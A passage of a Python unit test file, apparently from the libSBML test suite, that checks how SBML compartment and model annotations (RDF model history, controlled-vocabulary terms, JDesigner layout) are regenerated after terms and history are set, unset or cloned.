" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
c.setModelHistory(mh)
c.addCVTerm(cv)
c.unsetCVTerms()
expected1 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected1,c.toSBML()) )
c.unsetModelHistory()
c.unsetCVTerms()
c.addCVTerm(cv)
expected2 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected2,c.toSBML()) )
c.unsetModelHistory()
c.unsetCVTerms()
c.addCVTerm(cv)
c.setModelHistory(mh)
expected3 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected3,c.toSBML()) )
pass
def test_SyncAnnotation_modifyCVTerms_1(self):
c = self.m.getCompartment(4)
cv = c.getCVTerm(0).clone()
c.unsetCVTerms()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000012\" id=\"cc\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000012\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyCVTerms_2(self):
self.m.unsetCVTerms()
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyCVTerms_3(self):
cv = self.m.getCVTerm(0).clone()
self.m.unsetCVTerms()
self.m.addCVTerm(cv)
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyCVTerms_4(self):
cv = self.m.getCVTerm(0).clone()
c = self.m.getCompartment(0)
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyCVTerms_5(self):
c = self.m.getCompartment(6)
cv = c.getCVTerm(0).clone()
c.unsetCVTerms()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000042\" id=\"cc1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000042\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description/>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_1(self):
c = self.m.getCompartment(3)
mh = c.getModelHistory().clone()
c.unsetModelHistory()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000004\" id=\"C\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000004\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_2(self):
self.m.unsetModelHistory()
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyHistory_3(self):
mh = self.m.getModelHistory().clone()
self.m.unsetModelHistory()
self.m.setModelHistory(mh)
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
def test_SyncAnnotation_modifyHistory_4(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyHistory_5(self):
c = self.m.getCompartment(5)
mh = c.getModelHistory().clone()
c.unsetModelHistory()
c.setModelHistory(mh)
expected = wrapString("<compartment metaid=\"_000032\" id=\"C1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000032\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_noChanges_1(self):
c = self.m.getCompartment(1)
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_noChanges_2(self):
expected = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000001\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,self.m.getAnnotation().toXMLString()) )
pass
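# The stringChangesMetaid tests below check that setAnnotation() re-targets the
# rdf:about attribute to the element's own metaid and normalises W3CDTF
# timestamps to UTC (appending a trailing Z) when the pasted RDF is recognised
# as a valid model history.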
def test_SyncAnnotation_stringChangesMetaid(self):
c = libsbml.Compartment(3,1)
c.setMetaId("_000005")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
